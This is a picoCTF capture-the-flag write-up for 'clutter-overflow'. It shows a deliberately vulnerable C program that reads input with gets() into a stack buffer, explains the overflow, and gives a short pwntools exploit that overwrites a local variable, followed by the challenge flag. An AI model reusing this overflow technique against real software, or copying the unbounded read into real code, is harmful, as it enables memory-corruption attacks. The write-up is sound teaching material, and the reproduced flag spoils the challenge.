Binary Exploitation
{"author": ["ret2basic"]}

clutter-overflow

Solved by: ret2basic

Challenge

Clutter, clutter everywhere and not a byte to use.
nc mars.picoctf.net 31890

Recon

Recon

Source Code

#include <stdio.h>
#include <stdlib.h>
#define SIZE 0x100
#define GOAL 0xdeadbeef
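/*
 * Challenge program for "clutter-overflow", reproduced as given (the
 * line-number residue from the page's code widget is removed so the
 * listing reads as C again).
 *
 * Prints a banner and two prompts, reads one line from stdin into the
 * SIZE-byte stack buffer `clutter`, then compares the local `code` with
 * GOAL. `code` is initialised to 0 and never assigned afterwards, so the
 * success branch is reachable only if the read writes beyond `clutter`.
 *
 * HEADER is not defined in this listing; presumably it is a banner string
 * defined elsewhere in the challenge source.
 *
 * Returns 0 on both branches.
 */
int main(void)
{
    long code = 0;
    char clutter[SIZE];

    /* Turn off stdio buffering on all three streams (presumably so the
     * prompts reach a remote client immediately). */
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    setbuf(stderr, NULL);

    puts(HEADER);
    puts("My room is so cluttered...");
    puts("What do you see?");

    /*
     * DEFECT (intentional for the challenge, left unchanged): gets() takes
     * no length argument and keeps copying until newline or EOF, so any
     * input longer than SIZE - 1 characters is written past the end of
     * `clutter` into neighbouring stack memory. gets() was removed from
     * the language in C11. A bounded read such as
     *     fgets(clutter, sizeof clutter, stdin)
     * keeps the write inside the buffer.
     */
    gets(clutter);

    /*
     * NOTE(review): %llx expects an unsigned long long, but `code` is a
     * long and GOAL expands to an unsigned int constant. The format
     * strings are kept exactly as in the original source.
     */
    if (code == GOAL) {
        printf("code == 0x%llx: how did that happen??\n", GOAL);
        puts("take a flag for your troubles");
        /* Runs through the shell; flag.txt is a relative path, so it is
         * resolved against the process's working directory. */
        system("cat flag.txt");
    } else {
        printf("code == 0x%llx\n", code);
        printf("code != 0x%llx :(\n", GOAL);
    }

    return 0;
}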

Solution

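The program reads input with gets(), which does no bounds checking, into the 0x100-byte stack buffer clutter. Input longer than the buffer keeps being written into the stack memory that follows it, which is where the local variable code lives (the exploit below uses an offset of 0x110 - 0x8 = 0x108 bytes from the start of clutter). So: overwrite the code variable with 0xdeadbeef. A bounded read such as fgets(clutter, sizeof clutter, stdin) would keep the write inside the buffer and close the bug.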

Exploit

#!/usr/bin/env python3
from pwn import *
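#--------Setup--------#

# Tell pwntools the target is 64-bit Linux; flat() below packs integers
# using the word size and endianness taken from this context.
context(arch="amd64", os="linux")
# Loads the local copy of the challenge binary. `elf` is not referenced
# again in this script.
elf = ELF("chall", checksec=False)

host = "mars.picoctf.net"
port = 31890

#--------Overwrite variable--------#

# Number of filler bytes from the start of `clutter` up to `code`.
# NOTE(review): 0x110 and 0x8 look like the frame offsets of the two locals
# read from the disassembly, which this page does not show; confirm against
# the binary. The result (0x108) is 8 bytes more than the 0x100-byte buffer.
offset = 0x110 - 0x8

# Filler, then the value the program compares `code` against. With the
# amd64 context the integer is packed as one 8-byte little-endian word.
payload = flat(
    b"A" * offset,
    0xdeadbeef,
)

r = remote(host, port)

# The delimiter is passed as bytes: under Python 3 pwntools works on bytes
# and emits a BytesWarning when handed a str here.
r.sendlineafter(b"What do you see?\n", payload)

# Hand the connection to the terminal so the program's reply can be read.
r.interactive()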

Flag

picoCTF{c0ntr0ll3d_clutt3r_1n_my_buff3r}